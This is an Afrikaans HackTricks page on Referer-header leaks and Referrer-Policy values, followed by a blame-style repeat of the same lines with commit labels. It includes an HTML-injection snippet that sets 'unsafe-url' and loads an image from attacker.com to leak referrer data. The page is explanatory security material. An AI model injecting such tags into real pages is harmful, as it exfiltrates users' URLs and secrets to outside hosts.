hacktricks/todo/interesting-http.md

{% hint style="success" %}
Leer en oefen AWS-hacking: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer en oefen GCP-hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Controleer die [**inskrywingsplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>
{% endhint %}


# Verwysingskoppe en beleid

Verwysing is die kop wat deur webblaaie gebruik word om aan te dui watter die vorige bladsy was wat besoek is.

## Sensitiewe inligting wat uitgelek is

Indien op enige oomblik binne 'n webbladsy enige sensitiewe inligting op 'n GET-versoekparameters geleë is, as die bladsy skakels na eksterne bronne bevat of 'n aanvaller in staat is om die gebruiker te laat 'n URL besoek wat deur die aanvaller beheer word. Dit kan in staat wees om die sensitiewe inligting binne die laaste GET-versoek uit te skakel.

## Versagting

Jy kan die blaaier laat 'n **Verwysingsbeleid** volg wat die sensitiewe inligting kan **vermy** om na ander webtoepassings gestuur te word:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
## Teenmaatreël

Jy kan hierdie reël oorskryf deur 'n HTML meta-tag te gebruik (die aanvaller moet 'n HTML-inspuiting uitbuit):
```markup
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
```
## Verdediging

Moenie enige sensitiewe data binne GET parameters of paaie in die URL plaas nie.
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`{% hint style="success" %}`
			`Leer en oefen AWS-hacking: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Opleiding AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer en oefen GCP-hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Opleiding GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`<details>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`<summary>Ondersteun HackTricks</summary>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`* Controleer die [inskrywingsplanne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking-truuks deur PR's in te dien by die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github-opslag.`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`</details>`
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`{% endhint %}`
GitBook: No commit message 2024-04-06 18:08:38 +00:00

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`# Verwysingskoppe en beleid`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`Verwysing is die kop wat deur webblaaie gebruik word om aan te dui watter die vorige bladsy was wat besoek is.`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`## Sensitiewe inligting wat uitgelek is`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`Indien op enige oomblik binne 'n webbladsy enige sensitiewe inligting op 'n GET-versoekparameters geleë is, as die bladsy skakels na eksterne bronne bevat of 'n aanvaller in staat is om die gebruiker te laat 'n URL besoek wat deur die aanvaller beheer word. Dit kan in staat wees om die sensitiewe inligting binne die laaste GET-versoek uit te skakel.`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`## Versagting`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Jy kan die blaaier laat 'n Verwysingsbeleid volg wat die sensitiewe inligting kan vermy om na ander webtoepassings gestuur te word:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```
			`Referrer-Policy: no-referrer`
			`Referrer-Policy: no-referrer-when-downgrade`
			`Referrer-Policy: origin`
			`Referrer-Policy: origin-when-cross-origin`
			`Referrer-Policy: same-origin`
			`Referrer-Policy: strict-origin`
			`Referrer-Policy: strict-origin-when-cross-origin`
			`Referrer-Policy: unsafe-url`
			```
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`## Teenmaatreël`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00			`Jy kan hierdie reël oorskryf deur 'n HTML meta-tag te gebruik (die aanvaller moet 'n HTML-inspuiting uitbuit):`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```markup
			`<meta name="referrer" content="unsafe-url">`
			`<img src="https://attacker.com">`
			```
			`## Verdediging`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Moenie enige sensitiewe data binne GET parameters of paaie in die URL plaas nie.`